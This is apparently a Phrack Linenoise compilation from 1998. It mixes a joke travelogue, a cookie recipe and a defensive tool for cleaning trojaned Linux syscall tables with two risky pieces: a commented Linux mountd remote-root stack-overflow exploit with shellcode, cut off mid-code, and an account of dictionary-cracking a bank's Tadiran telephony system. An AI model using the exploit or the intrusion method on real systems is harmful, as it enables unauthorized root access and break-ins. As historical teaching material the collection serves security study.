apparently (For those of you unfamiliar, a guilder is the Netherlands unit
of money, and roughly resembles monopoly money, except a guilder isn't
really worth anything, whereas monopoly is fun!). We refused, and Chico
got mad. He started telling us, "WE ARE GOING TO HAVE A PROBLEM SOON."
After that, things were "STARTING TO GET VERY SERIOUS." Finally, Chico
got pissed off and broke a beer bottle and started going insane, so r00t &
h4g1s made a temporary truce and started running.
After turning several corners, the mad outlaw was chasing after us with
his broken glass wielding in the cold winter night. We were now in the
"red light district", the physical equivalent to the place on the Internet
where you can buy whores and have sex with them, and people were looking
at us funny being chased through the streets.
Day 4:
We slept through day 4.
Day 3:
Things were getting very strange in Amsterdam. Most notably, day 3
happened AFTER day 4. Don't ask me how. It may have related to the
fungus located within a "Inner Visions" container that we consumed in
the hopes of progressing our talks further. We played some Ultima Online,
except we didn't use any computers. I think there was a strange
steakhouse experience at some point this day, but I can't provide any
further details.
Day 5:
Everything in the world is energy vibrating at different rates. If we
can find some way to make our own matter vibrate at a consistently faster
rate we can transcend the physical universe and enter the digital plane.
I think we need to switch tenses back to the past before. With Outlaw out
of the picture, we resumed our negotiations over some spacecakes (its like
a brownie, or a muffin, or a donut, except it has Zero Day in it).
Day 6:
I thought we ate all the shrooms in Day Pi! Ok, fine. Things are
easier to handle when you have a vision. Vision is just a hallucination
induced by energy waves bouncing around in your head. Your head is cool.
COOL is a lame stock. EBAY is insanely overpriced. So are M3s. Mach 3's
are cool razors. Razors are sharp. Sharp MD players are too thick. As
is Mark's cock. And long!
-r00t & h4g1s
0x2>-------------------------------------------------------------------------
A CASE STUDY: LINUX MOUNTD STACK OVERFLOW
There is nothing new here, but the code is a text book example of how buffer
overflows are done. Even if you have read other articles on buffer overflows
you might find something of value in here. Or maybe not. The case studied
is the Linux nfsd/mountd vulnerability mentioned in the CERT advisory on
Aug 28.
nuuB
<++> linenoise/mountd-sploit.c
/*
* mountd-sploit.c - Sploit for Linux mountd-2.2beta29+ (and earlier). Will
* give a remote root shell.
*
* Cleaned up, documented and submitted to Phrack on Sep 3 1998.
*
* I've included a quick primer on stack overflows and made lots of comments
* in the code, so if you don't know how these stack overflow exploits work
* take this opportunity to learn something.
*
* It is trivial to extend the code (or use scripting) to make something that
* automatically scans subnets or lists of IPs to find vulnerable systems.
* This is left as an exercise for the enterprising young hax0rs out there.
*
* You need the following RPC files for your particular architecture:
*
* nfsmount.h
* nfsmount_xdr.c
*
* These can be generated from 'mount.x' by the 'rpcgen' utility. I simply
* lifted the files that came pre-generated with Linux 'mount'. These are
* included uuencoded, but they may not work on your particular system. Don't
* bug me about this.
*
* Compile with:
*
* cc mountd-sploit.c nfsmount_xdr.c -o mountd-sploit
*
* Have fun, but as always, BEHAVE!
*
* /nuuB
*
*/
/*
A QUICK PRIMER ON STACK OVERFLOWS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Read Aleph1's article in Phrack Issue 49 File 14 (P49-14) for a detailed
explanation on how to write sploits (the examples are for Linux/i386 but
the methodology is valid for any Unix, and can be applied to other OS's
once you understand the technique). If you are targeting one of Bill's OS
check out cDc #351: "The Tao of Windows Buffer Overflow" by DilDog.
The properties that we take advantage of are:
* The stack memory pages have the execute bit set
* The return address from functions are stored on the stack on a higher
address than the local variables.
MEMORY MAP
-- Start of stack (i.e bottom of stack - top of memory) e.g 0xc0000000 --
<environment variables>
<stack frames from main() down to the function calling our function>
<arguments to the vulnerable function>
<** return address **>
<frame pointer for prev frame - unless compiled with -fomit-frame-pointer>
<local variables for the vulnerable function>
-- Top of stack (lower memory address) e.g 0xbffff9c8 --
THE OVERFLOW
The trick is to overflow a local variable that is set through a function
that doesn't check for overflows (strcpy, sprintf, etc). By supplying a
(too) long string you can overwrite memory at higher addresses, i.e closer
to the start of the stack. More specifically we want to overwrite
<** return address **> with a pointer that points back into the stack that
contains code we want executed. Getting the code on the stack is done by
including it in the string we are overflowing with, or by placing it in
an environment variable.
The code can do anything you like, but the standard thing is to execve()
a shell. There are often limitations on what the code can look like in
order to be placed unmangled on the stack (length, touppper(), tolower(),
NULL bytes, path stripping etc). It all depends on how the target program
processes the input we feed it. Be prepared for some tinkering to avoid
certain byte patterns and to make the code use PC/IP relative addressing.
The overflow string (called the 'egg') is normally passed to the
target program through command line arguments, environment variables,
tcp connections or in udp packets.
POSSIBLE COMPLICATIONS
Sometimes you will destroy other local variables with your egg (depends on
how the compiler ordered the variables on the stack). If you use a long
enough egg you could also trash the arguments to the function. As your code
isn't executed until the vulnerable function returns (not at the return of
the function doing the actual overflowing, e.g strcpy()), you must make sure
that the corrupted variables don't cause a crash before the return. This
means that your egg probably has to be aligned perfectly, i.e only use one
return pointer and preceed it with 'correct' values for the local variables
you are trashing. Unfortuntely the ordering of the variables is often
dependent on what compiler options were used. Optimization in particular
can shuffle things around. This means that your exploit will sometimes have
to target a particular set of options.
Most of the time the trashing of other local variables isn't a problem but
you may very well run into it some day.
THE RETURN POINTER
The only problem left is to guess the right address to jump to (i.e the
return pointer). This is done either by trial and error or by examining the
executable (requires you have access to a system identical to the target).
A good way to get a reasonable starting value is to find out how much
environment variables the target process has (hint: use 'ps uxawwwwwwwwe')
and combine that with the base stack pointer (you can find that out with
a one line program that shows the value of the stack pointer).
To increase the chances of success it is customary to fill out the start of
the egg with NOP opcodes, thus as long as the pointer happens to point
somewhere in the egg before the actual code it will execute the NOPs
then the code.
That is all there is to it.
/
/*
* Now, back to our case study.
*
* Target: rpc.mountd:logging.c
*
* void Dprintf(int kind, const char *fmt, ...) {
* char buff[1024];
* va_list args;
* time_t now;
* struct tm *tm;
*
* if (!(kind & (L_FATAL | L_ERROR | L_WARNING))
* && !(logging && (kind & dbg_mask)))
* return;
* ...
* vsprintf(buff, fmt, args); <-- This is where the overflow is done.
* ...
* if (kind & L_FATAL)
* exit(1);
* } <-- This is where our code (hopefully) gets executed
*
* This function is called from (e.g) mountd.c in svc_req() as follows:
*
* #ifdef WANT_LOG_MOUNTS
* Dprintf(L_WARNING, "Blocked attempt of %s to mount %s\n",
* inet_ntoa(addr), argbuf);
* #endif
*
* Looks great (WANT_LOG_MOUNTS appears to be defined by default). Type
* L_WARNING is always logged, and all we have to do is to try to mount
* something we are not allowed to (i.e as long as we are not included in
* /etc/exports we will be logged and get a chance to overflow).
*
* The only complication is the first %s that we will have to compensate for
* in the egg (our pointers must be aligned correctly).
*
* We use 5 pointers to avoid problems related to how the compiler organized
* the variables on the stack and if the executable was compiled with or
* without -fomit-frame-pointer.
*
* 3 other local variables (size=3*4) + 1 frame-pointer + 1 return pointer = 5
*
* Still plenty of room left for NOPs in the egg. We do have to make sure that
* if the 3 other variables are trashed it won't cause any problems. Examining
* the function we see that 'now' and 'tm' are initialized after the vsprintf()
* and are thus not a problem. However there is a call 'va_end(args)' to end
* the processing of the ellipsis which might be a problem. Luckily this is
* a NOP under Linux. Finally we might have trashed one of the arguments
* 'kind' or 'fmt'. The latter is never used after the vsprintf() but 'kind'
* will cause a exit(1) (bad!) if kind&L_FATAL is true (L_FATAL=0x0008).
* Again, we are in luck. 'kind' is referenced earlier in the function and in
* several other places so the compiler has gratiously placed it in a register
* for us. Thus we can trash the arguments all we want.
*
* Actually, if you examine the executables of mountd in the common distros
* you will find that you don't have to trash any variables at all as 'buffer'
* is placed just before the frame pointer and the return address. We could
* have used a simple egg with just one pointer and this would have worked
* just as well in practise.
*
* All this 'luck' is in fact rather common and is the reason why most buffer
* overflows are easy to write so they work most of the time.
*
* Ok. Delivery of the egg is done through the RPC protocol. I won't go into
* details here. If you are interested, get the sources for the servers and
* clients involved. Half the fun is figuring out how to get the egg in place.
*
* The last piece of the puzzle is to keep shoveling data from the local
* terminal over the TCP connection to the shell and back (remember that
* we used dup2() to connect the shell's stdout/in/err to the TCP connection).
*
* Details below.
*/
#include <unistd.h>
#include <stdio.h>
#include <string.h>
#include <errno.h>
#include <sys/time.h>
#include <sys/types.h>
#include <fcntl.h>
#include <signal.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <rpc/rpc.h>
#include <rpc/pmap_prot.h>
#include <rpc/pmap_clnt.h>
#include "nfsmount.h"
/*
* First we need to write the code we want executed.
*
* C0de: setreuid(0, 0); fork(); dup2(0, 1); dup2(0, 2); execve("/bin/sh");
*
* setreuid() is probably not necessary, but can't hurt.
*
* fork() is done to change pid. This is needed as someone - probably the
* portmapper - sends signals to mountd (the shell has no handlers for these
* and would die).
*
* The dup2()'s connect stdout/stderr to the TCP socket.
*
* The code assumes 'mountd' communicates with the client using descriptor
* zero. This is the case when it is started as a daemon, but may not be so if
* it is launched from inetd (I couldn't be bothered to test this). The
* dup2()'s may need to be changed accordingly if so.
*
* For Linux/i386 we would get:
*/
#if 0
void c0de() {
__asm__(
"jmp .get_string_addr\n\t" /* Trick to get address of our string */
".d01t:\n\t"
"xorl %eax,%eax\n\t"
"movl %eax,%ebx\n\t" /* ruid=0 */
"movl %eax,%ecx\n\t" /* euid=0 */
"movb $0x46,%eax\n\t" /* __NR_setreuid */
"int $0x8
0x3>-------------------------------------------------------------------------
Eleet ch0c0late ch1p co0kies
by Juliet
The chocolate chip cookies is an old exploit. You can use it to bribe
your teachers, sysadmins, bosses, even feds. Never underestimate the
cookie. Picture this.. little girlie walks up to you in the NOC.. offers
you a home-baked chocolate chip cookie! She must be someone's secretray..
or something.. wow she sure fooled you.. anyway.. bake them.. they are
good.. DO NOT substitue ingrediants.. other than like M&M's for chocolate
chips..
1 cup (packed) golden brown sugar
1/2 cup sugar
1/2 cup solid vegetable shortening, room temperature
1/2 cup (1 stick) unsalted butter, room temperature
2 large eggs
1 tablespoon vanilla extract
3 cups all purpose flour
1 teaspoon baking soda
1 teaspoon salt
1 12-ounce package semisweet chocolate chips
Preheat oven to 350F. Using electric mixer, beat both sugars, shortening
and butter in large bowl until light and fluffy. Beat in eggs and
vanilla. Mix flour, baking soda and salt in large bowl. Add dry
ingredients to butter mixture and mix until blended. Stir in chocolate
chips.
Drop dough by heaping tablespoonfuls onto heavy large baking sheets, spacing
2 inches apart. Bake until golden brown, about 12 minutes. Transfer baking
sheets to racks; cool 5 minutes. Transfer cookies to racks;
cool completely.
Makes about 42 cookies.. or you can make ONE BIG pan cookie
0x4>-------------------------------------------------------------------------
- Tadiran; Computer Telephony Integration (CTI) -
Blakboot <blakboot@darkcartel.com>
Introduction
============
Hello everyone. This article is primarily about Tadiran Telecommunications
software and hardware used to syncronize computer applications with phone
calls. I will be refering to system version 9.63.03.01 and any variants as
just `Tadiran`. From firsthand experiences with this type of system I've
found that they can be configured to do many things, from trunk timers to
on hold music.
Although a very powerful system, the Tadiran lacks basic security. This is
a no no, especially when it provides worldwide technologies for all types
of industries, including banking.
The issue of lack of security is mainly why I wanted to write this article.
The Tadiran is very much open to intrusion.
How it began
============
A phreak friend of mine, Mf-Man, and I were scanning for loops, we found
a carrier. We took a short look at the system for a while, until our
interests waned and took us elsewhere..
Months later, bored, I dialed into the system, with plans of throwing a
dictonary file at it at steady pace (Tadiran, only requires a password for
authentication).
So, I just sat back, and waited... After a long while, to my gleeful
surprise, it cracked! I (like many others before me) did that zealous
happy dance.
This system, Tadiran, is rather cryptic without documentation. Even still,
I managed to dig up some interesting info. This system I managed to get
into was that of a CTI system from a well known bank. The major flaws thus
far (I plan to write a more in depth article):
* Unlimited password attempts.
* No login names.
* A password prompt that responds, well, promptly.
What follows are some screen shots of the Tadiran system.
The system
==========
Password prompt: ENTER PASSWORD
Bad password Msg.: ILL PASSWORD , TRY AGAIN !
System prompt: *:
Enviroment: Tree menus; menus branch from root, and so on.
-This the root menu, the menu sent upon login.-
(ROOT)
CCS 9.63.03.01 SMDI & 24SDT
Copyright (c) 1991-1997 Tadiran Telecommunications Ltd.
NAME - xxxxxxxxx
SAU # - xxxx
0-CONFIG
1-DIAGN
2-TABLES
3-ADMIN
4-ROUTING/COST
5-ISDN
6-DATA
7-CoraLINK
8-NETWORK
9-HELP
Any of the menus/options can be choosen by number, or name.
Control keys:
^C / ESC ------ Go back 1 menu.
^T ------ Displays account and system information.
EXAMPLE:
CCS: xxxxxxxx xxx-xx-1998 10:48pm
Terminal No.: 4, Password level: 0
Software Version: 9.63.03.01 SMDI & 24SDT
^P ------ Relogin.
/* There are others--they seem have something to do with emulation,
and scrolling. *\
Menu descriptions - ment for reference.
=========================================
This is a list of globally accessable menus, available by typing, "HELP"
<Note> I've "x"'d out all group names from the orignal system this
information was recovered from.
PI MESSAGES =(MSG) FEAT. & AUTH. =(FEAT) SMDR CONTROL = (SMDR)
47/8T CARD_DB =(TKDB) FEATURE TIMERS=(FE.T) STATION TIMERS =(ST.T)
ALT ROUT TK.GRP=(ROUT) GROUPS =(GROUP) SYSTEM GEN. =(SYSGEN)
xxxx/xxx GROUP =(xxxx) xxxxxxx GROUP =(xxxx) SYS FEATURES = (SFE)
xxxx GROUP =(xxxx) IST/SLT CARD_DB=(STDB) SYS TIME SET-UP=(TIME)
BUSY PORTS =(BUSY) IST/SLT DEF. =(SLT) TERMINAL SET-UP=(TERM)
CARD DATA-BASE = (CDB) LCR/ROUTING =(LCR) TOLL BARRIER =(TOLL)
CARD LIST =(CLIS) xxxxxxxxx =(xxx) TONE PLAN = (TON)
CLASS OF SERVICE=(COS) xxxxxxxxxxxxx=(xxxxx) TRUNK DEFINITION=(TRK)
COST_CALC. =(COST) NUMBERING PLAN =(NPL) TRUNK_GROUP =(TKGP)
DATA SERVICES =(DATA) PICKUP GROUP =(PICK) TRUNK GRP DEF =(TGDEF)
xxxx CARD DB =(DIDB) PORT DATABASE =(PDB) TRUNK PORTS =(TRUNK)
xxx/xxx GROUP =(DIDG) PORT LIST =(PLIS) TRUNK TIMERS =(TK.T)
DIGITAL TRUNK =(DTDB) PREFERENCE =(PREF) WAKEUP =(WAKEUP)
KEY DEFINITION = (KEY) DIGITAL BUS LIST=(DLIS) ZONED GROUP =(VPZ)
KEY PROGRAMING =(PROG) RINGER P.S. =(RPS) VFAC =(VFAC)
KEYSET TIMERS =(EK.T) SIZES DEF =(SIZ) GROUP CALL =(CALL)
PI MESSAGES - Terminal setup, diag/stim.
47/8T CARD_DB - Card information. Example:
LS_RING_PAUS (sec)- 5
GS_RING_PAUS (sec)- 1
O/G BREAK_TIME(ms)- 60
O/G MAKE_TIME (ms)- 40
O/G INTERDGT_T(ms)- 800
GS_DISCONNECT (ms)- 800
METER (4TMR) :
f0 (0=16K,1=12K,2=50Hz)- 0
f0 ACCURACY +/-(1-10)% - 3
METER_AFTER_DISCONNECT (Y/N) - N
ALT ROUT TK.GRP - Add, display, update, or remove trunk group.
BUSY PORTS - Displays what ports are busy.
CARD DATA-BASE - List many submenus of card, in which you may get/update
CARD LIST - EXAMPLE:
shelf#/slot# p_type i_type card_db# vers/subver status
0 / 1 NO_CARD NO_CARD --- --- --- ------
0 / 2 8DTR/S NO_CARD --- 17 8 ACTIVE
0 / 3 T1 T1 1 14 38 ACTIVE
CLASS OF SERVICE - ST/TK, and ATT show all kinds of information on
trunk control. TENANTS deals with group access.
COST_CALC. - Information about costs for certain services, at various
times.
DIGITAL TRUNK - Card/trunk information, configuration, channel signaling.
KEY DEFINITION - Telephone configuration
EXAMPLE:
prm_cos- 1 sec_cos- 1 priv_libs- 12 terminal- N
origin- N block- N o/g_tk_rest- N privacy- Y
excl_hold- N hard_hold- N last_num- Y security- N
att- Y auto_unatt-N passcode- NONE check_out- N
multi_app- Y m.a.mute_ring-Y mute_ring- Y
auto_ans- N idle_disp.-Y keyclick- Y music- Y
music_num- 0 v_page_in- Y auto_ans_v_p- Y auto_hld/xfer/off-1
spkr_on/off-Y blind_att- N pcc- Y pc_acd- N
mic- Y comb_audio-N display_size- NO_DSP language-DEFAULT
but_num- 2 ksi- N ksi_type- 0
eis- N send_id- Y ali- NONE aoc-e_display-N
alert_makecall-N
active dpem id's- NONE installed dpems- 1
dkt: spkr_environment- 1
music_on_hold - 0
KEYSET TIMERS - EXAMPLE:
1 unit = 0.1 sec.
AUTO_ANSWER - 10
AUTO_ANS_V_PAGE - 10
TONE_TO_IDLE - 10
AOC-E_DISPLAY - 300
MUTE_RING - 50
FEAT. & AUTH - Authorizations, and system features. Check here to
see if Call trace OR caller ID is active.
FEATURE TIMERS - This is a bit interesting.
EXAMPLE:
* (1 unit =1.0 sec)
** (1 unit =0.1 sec)
***(1 unit =0.01 sec)
*AUTO_REDIAL- 30
*REMIND_SNOOZE- 60
*WAKEUP_SNOOZE- 60
**WAKEUP_RING - 300
**NET_FEATURE_ACK- 40
**SUSP_OFFHK- 5
BELL_RING:
**ON_BELL - 10
**OFF_BELL - 20
**ATT.MSG- 50
**EXPENSIVE_ROUTE_TONE - 10
**RING- 100
**SUPV_RECALL- 3600
**CONF_SUPV_RECALL- 1800
**BREAK_IN/OUT- 10
BREAKIN_WARNING:
**ON - 1
**OFF - 20
GROUPS - List of submenus, of groups.
IST/SLT CARD_DB - Ring information.
IST/SLT DEF. - Slot of line info.
EXAMPLE:
prm_cos- 0 sec_cos- 0 priv_libs- 3 terminal- N
origin- N block- N o/g_tk_rest-N privacy- Y
excl_hold-N hard_hold- N last_num- Y security- N
att- N auto_unatt-N passcode- NONE check_out- N
type- 1 announcer- N multi_app- N send_id- Y
ali- NONE opx- N hf_relevant-Y music_on_hold-0
LCR/ROUTING - Libraries, update, or display.
NUMBERING PLAN - Lines, and there features: UPDATE, DISPLAY, ADD,
REMOVE, or SHOW
STATION TIMERS - EXAMPLE:
1 unit = 0.1 sec.
RING- 450
MULT_APR_RING- 200
BUSY- 1200
REORDER- 50
CONFIRM- 30
DVMS- 200
HOLD- 6000
HARD_HOLD- 1200
PARK- 1200
PAGE_Q- 600
1st_DGT - 100
INTERDGT- 150
FEAT_DIAL- 700
HKFLS_FILTER- 10
MAGNETO_AUTO_ANS- 30
CF_NO_ANS- 200
SYSTEM GEN - MENU:
(SYSGEN)
0-INSTALL
1-SIZES_DEF
2-SIZES_TAB
3-SPEED_CALLS (MCC only)
4-MUSIC
5-TIME_SLOTS (4GC only)
0-TRUNK_CALLS_OUTGOING
SYSTEM FEATURES - Trunk_calls_incoming, station_options, intercept/
incomplete, call_forwarding, camp_on, hotel,messaging,
tones, diagnosrics, ISDN, network, and wireless
TONE PLAN - EXAMPLE:
~~~~~~~~
NO NAME TYPE #SEG 1TN Msec 2TN Msec 3TN Msec 4TN Msec 5TN Msec 6TN Msec
0 Busy 3 2 3 500 0 500 0 0 0 0 0 0 0 0
1 Dial 1 0 1 0 0 0 0 0 0 0 0 0 0 0
2 Distinct. 1 0 4 0 0 0 0 0 0 0 0 0 0 0
3 Reorder 3 2 3 240 0 240 0 0 0 0 0 0 0 0
4 Ringback 3 2 2 2000 0 4000 0 0 0 0 0 0 0 0
5 Silence 1 0 0 0 0 0 0 0 0 0 0 0 0 0
6 Tick 3 2 5 60 0 1000 0 0 0 0 0 0 0 0
8 Confirm 3 2 1 100 0 100 0 0 0 0 0 0 0 0
9 BRK_In/Out 1 0 5 0 0 0 0 0 0 0 0 0 0 0
11 V.P Conf 3 2 3 100 5 100 0 0 0 0 0 0 0 0
12 Z.P Warn 3 2 6 300 3 100 0 0 0 0 0 0 0 0
14 LCR_expens 2 6 0 120 5 80 0 120 5 80 0 120 5 80
15 LCR_cheap 2 4 0 120 5 80 0 120 5 80 0 0 0 0
16 Call Wait 3 4 5 600 0 5000 0 5000 0 5000 0 0 0 0
17 DISA Dial 1 0 1 0 0 0 0 0 0 0 0 0 0 0
TRUNK DEFINITION - EXAMPLE:
DISA (0-NO /1-IMMED. /2-DELAY)- 0
COS.- 10
TK_TIMER#- 1
TYPE (0-PULSE /1-DTMF /2-MIX)- 1
I/C_ONLY-N
O/G_ONLY-N
BUSY_OUT-N
AUTO_GUARD-N
HOT_IMMED-N
HOT_DELAY-N
DROP_NO_DIAL-N
RSRVD_TO- NONE
CALLER_ID_TIMEOUT - 50
TRUNK TIMERS - EXAMPLE:
H.FLASH(10ms)- 67
INCOMING :
E&M_SEIZE_TO_WINK- 1
E&M_CONT_WINK_TIME- 2
OUTGOING :
E&M_CONT_WINK/SG_DELAY- 1
SEIZE_TO_DIAL- 15
SECOND_DIAL_TONE- 60
VFAC - Account maintance. - Requires password.
---The ones that I didn't list were either self-explanitory, or N/A
0x5>-------------------------------------------------------------------------
b t r o m b y r i q
------------------------------------------------------------------------------
"trojan eraser or i want my system call table clean"
------------------------------------------------------------------------------
i n t r o d u c t i o n
------------------------------------------------------------------------------
The other day, I started to play with the itf that appeared in P52-18 (read
that article if you want to know what it does, etc). It occured to me one
good way to determine if someone has installed the trojan (and to subsequently
remove it) is by fixing the system call table. This program tries to do that.
This works with the the linux x86 2.0 and 2.2 series.
------------------------------------------------------------------------------
i n t e r n a l s
------------------------------------------------------------------------------
The program first attempts to detect if you are using a BIG_KERNEL (a bzImage)
or not (a zImage). One of the differences is the address of the kernel in
memory. BIG_KERNEL starts at 0xc0000000 while the other starts at 0x00100000.
The system call table (sct) has the entries of all the system calls. If
you modify the sct, the new entry must be `out of range'. btrom will try to
fix these `out of range' system calls with their original values. They are
taken from the System.map. What i mean with "`out of range'" is an entry
that has a value out of the start_of_the_kernel and the_start_of_the_kernel +
some_value. This value is in the config.h
------------------------------------------------------------------------------
q u i c k i n s t a l l
------------------------------------------------------------------------------
compile:
--------
1) edit config.h and Makefile. Modify it if you want.
$ vi config.h
$ vi Makefile
2) make
$ make
use:
----
1) be root
$ su -
2) install the module mbtrom
# insmod mbtrom
3) run btrom
# ./btrom _nr_mbtrom_ [options]
4) uninstall the module mbtrom
# rmmod mbtrom
------------------------------------------------------------------------------
c h a c h a r a
------------------------------------------------------------------------------
1st part: detect trojans legends
[ ] this is ok. dont worry
[N] this is a null enter in the system call table. dont worry.
[-] this is the entry of the module mbtrom. dont worry.
[?] this entry has a system function, but it was supposed to be null. worry
[*] this is probably a trojan in a reserved space. worry.
[!] this is probably a trojan in a not reserved space. worry.
2nd part: clean trojans legends
<s> press 's' to fill this entry with the System.map's value.
<c> press 'c' to clean this entry. it will be filled with a null entry.
<m> press 'm' to put in this entry a manual hexa address.
<i> press 'i' to ignore, skip, what you want.
------------------------------------------------------------------------------
n o t e s
------------------------------------------------------------------------------
this program doesnt uninstall trojan modules.
this program disables the trojans, so, after that,
you can uninstall the trojan with 'rmmod'.
------------------------------------------------------------------------------
b u g s
------------------------------------------------------------------------------
if `insmod mbtrom' doesnt returns any value, is because you are redirecting
that message with syslogd. Please check /etc/syslog.conf and see "kern".
------------------------------------------------------------------------------
h i s t o r y
------------------------------------------------------------------------------
version 0.3 (01/12/98) compatible with kernel 2.0 y 2.2.
works with BIG_KERNEL and with SMALL
english version
version 0.2 (25/11/98) first version
version 0.1 (21/11/98) something really ugly
all this happened when i see the itf (intregated trojan facility in P52-18)
------------------------------------------------------------------------------
f e e d b a c k
------------------------------------------------------------------------------
riq@ciudad.com.ar
<++> linenoise/btrom/Makefile
#
# Makefile del b t r o m
#
## BUG. This must be the same as the one in config.h
SYSTEM_MAP = "/usr/src/linux/System.map"
AWK = awk
CC = gcc
#CFLAGS = -DSYSTEM_MAP=$(SYSTEM_MAP)
all: parse btrom mbtrom
parse:
$(AWK) -f sys_null.awk $(SYSTEM_MAP) > sys_null.h
btrom: btrom.o
$(CC) btrom.c -O2 -Wall -o btrom
mbtrom:
$(CC) -c -O3 -Wall -fomit-frame-pointer mbtrom.c
clean:
rm -f mbtrom.o btrom.o btrom sys_null.h
<-->
<++> linenoise/btrom/btrom.c
/*
* btrom - Borra Trojanos Modulo
* por Riq
* 1/Dic/98: 0.3 - Compatible con kernel 2.2 y soporta BIG_KERNEL
* 25/Nov/98: 0.2 - Version inicial. Soporta kervel 2.0 i386
*/
#include <stdio.h>
#include <unistd.h>
#include <asm/unistd.h>
#include <stdlib.h>
#include <stdio.h>
#include <fnmatch.h>
#include <strings.h>
#include <linux/sys.h>
#include "config.h"
#include "sys_null.h"
FILE *sm;
FILE *au;
int quiet;
int borrar;
int dif_n_s;
unsigned int big_kernel;
/***********************************************************************
System.map
int segunda_recorrida(int j)
{
char nombre[50],dire[50];
int address;
int i,old_clean,clean,retval,key;
char c;
unsigned int k;
old_clean=clean=0;
printf( "\n2nd part: Clean Trojans\n"
" s = System.map address\n"
" c = clean address\n"
" m = manual address\n"
" i = ignore\n"
" now System.map Num [ ] Syscall Name\n"
"---------------------------------------\n");
for( i=0; i< NR_syscalls ; i++ ){
__asm__ volatile (
"int $0x80":"=a" (retval):"0"(j),
"b"((long) (i)),
"c"((long) (0)),
"d"((long) (0)));
clean = comun_1er_2da(j,i,nombre,&c,clean,retval);
if( clean > old_clean ) {
if( nombre[0]!=0 ) {
if( sm && sm_busca_x_nombre(&address,nombre)) {
if(retval!=address && retval < big_kernel + LIMITE_SYSCALL) {
dif_n_s++;
printf("%8x!%8x %3i [%c] %s <s/c/m/I>?",retval,address,i,c,nombre);
} else printf("%8x %8x %3i [%c] %s <s/c/m/I>?",retval,address,i,c,nombre);
} else printf("%8x %3i [%c] %s <c/m/I> ?",retval,i,c,nombre);
} else printf("%8x %3i [%c] <c/m/I> ?",retval,i,c);
old_clean = clean;
fseek(stdin,0L,SEEK_END);
key=fgetc(stdin);
switch(key) {
case 's':
k = address;
break;
case 'c':
k = SYS_NULL;
break;
case 'm':
printf("Enter an hexa address (ex: 001a1b):");
fseek(stdin,0L,SEEK_END);
fgets( dire,50,stdin );
k = strtoul(dire,(char **)NULL,16);
break;
default:
k=1;
break;
}
/* FIXME: 1 no se puede poner como address */
if(k!=1)
__asm__ volatile (
"int $0x80":"=a" (retval):"0"(j),
"b"((long) (i)),
"c"((long) (1)),
"d"((long) (k)));
}
}
return clean;
}
void help()
{
printf( "\nUsage: btrom nr_of_mbtrom [-c][-v]\n"
"\t1) Install the module mbtrom with`insmod mbtrom'\n"
"\t2) The module must return a value.If not see the README->bugs\n"
"\t btrom value_returned_by_mbtrom [-c][-v]\n"
"\t `v' is verbose. Recommended\n"
"\t `c' is clean. Cleans the trojans\n"
"\t3) Uninstall the module mbtrom with 'rmmod mbtrom'\n"
"\n"
"\tExamples:\n"
"\t btrom 215 -cv\n"
"\t btrom 214 -v\n"
"\t btrom 215\n"
"\nWarning: Dont put random numbers. Be careful with that!"
"\nRecommended: Do `btrom _number_ -v' before a cleaning\n\n"
);
exit(-1);
}
void chequear_argumentos( char *parametros )
{
int i,j;
i=strlen(parametros);
if(parametros[0]!='-') help();
for(j=1;j<i;j++) {
switch(parametros[j]) {
case 'c':
borrar = 1;
break;
case 'v':
quiet = 0;
break;
default:
help();
}
}
}
int main(int argc, char **argv, char **envp )
{
unsigned int retval;
int clean;
int i;
printf( "\n\n"
"b t r o m b y r i q\n"
"v"VERSION"\n");
if(argc <2 || argc >3 ) help();
quiet = 1; borrar = 0 ;
if( argc==3) chequear_argumentos(argv[2]);
au = au_open();
sm = sm_open();
if(!au && !quiet)
printf("Error while opening `asm/unistd.h' in `"ASM_UNISTD"'\n");
if(!sm && !quiet)
printf("Error while opening `System.map' in `"SYSTEM_MAP"'\n");
dif_n_s=0;
/* __NR_mbtrom number */
i = atoi( argv[1] );
if(!i)
help();
/* Chequeo si es BIG_KERNEL o no */
__asm__ volatile (
"int $0x80":"=a" (retval):"0"(i),
"b"((long) (0)),
"c"((long) (2)),
"d"((long) (0)));
big_kernel =(retval>BIG_KERNEL?BIG_KERNEL:SMALL_KERNEL);
/* Primer recorrida */
clean = primer_recorrida( i );
/* Mensaje del senior btrom */
printf( "\nb t r o m s a y s:\n");
if(dif_n_s>0) {
printf( "Your System.map seems to have a problem.\n");
if(dif_n_s<SYSMAP_LIMIT)
printf( "Wait. Perhaps this is not a System.map problem,\n"
"but something related with the new functions names.\n"
);
else
printf( "Are you sure that you have a valid System.map ?\n");
if(clean)
printf( "Oh no! The problem is the trojan that you have ;-)\n");
}
if(!clean) {
printf( "You system call table seems to be clean.\n");
if(quiet)
printf("If you want to be more sure use the `-v' option\n");
} else {
printf( "\nWhat do you want to do with the trojan?\n"
"What about cleaning it with `btrom _numero_ -c'?\n" );
}
/* Ah borrar los troyanos se ha dicho */
if(borrar && clean) {
if(au)
fseek(au,0L,SEEK_SET);
if(sm)
fseek(sm,0L,SEEK_SET);
segunda_recorrida( i );
}
if(au)
fclose(au);
if(sm)
fclose(sm);
return 0;
}
<-->
<++> linenoise/btrom/config.h
/*
config.h
usado por btrom.c y mbtrom.c
/
/*
Modificar segun los gustos
/
/* Numero que uno supone que esta vacio en la sys_call_table */
#define NUMERO_VACIO 215
/* Path al archivo System.map */
/* Si Ud. nunca compilo el kernel tal vez sea /boot/System.map */
/* FIXME: Usar el define del Makefile para no definir esto en 2 partes */
#ifndef SYSTEM_MAP
#define SYSTEM_MAP "/usr/src/linux/System.map"
#endif
/* Hay problemas con old y new. Gralmente no es problema de la System.map */
#define SYSMAP_LIMIT 8
/* Path al archivo asm/unistd.h */
#define ASM_UNISTD "/usr/include/asm/unistd.h"
/* Prefijo a buscar en asm/unistd.h*/
#define AU_PREFIX "#define*__NR_*"
/* Hasta donde llega el kernel space */
/* FIXME: No se cual es el limite realmente. Igual con esto anda :-) */
#define LIMITE_SYSCALL 0x00300000
/*
No modificar
/
/* Version del btrom */
#define VERSION "0.3"
/* BIG_KERNEL y SMALL_KERNEL*/
#define BIG_KERNEL 0xc0000000
#define SMALL_KERNEL 0x00100000
<-->
<++> linenoise/btrom/mbtrom.c
/*
* modulo del btrom - Borra Trojanos Modulo
* 25/11/98 - por Riq
*
* compile with:
* gcc -c -O3 -fomit-frame-pointer mbtrom.c
*
*/
#define MODULE
#define __KERNEL__
#include <linux/config.h>
#ifdef MODULE
#include <linux/module.h>
#include <linux/version.h>
#else
#define MOD_INC_USE_COUNT
#define MOD_DEC_USE_COUNT
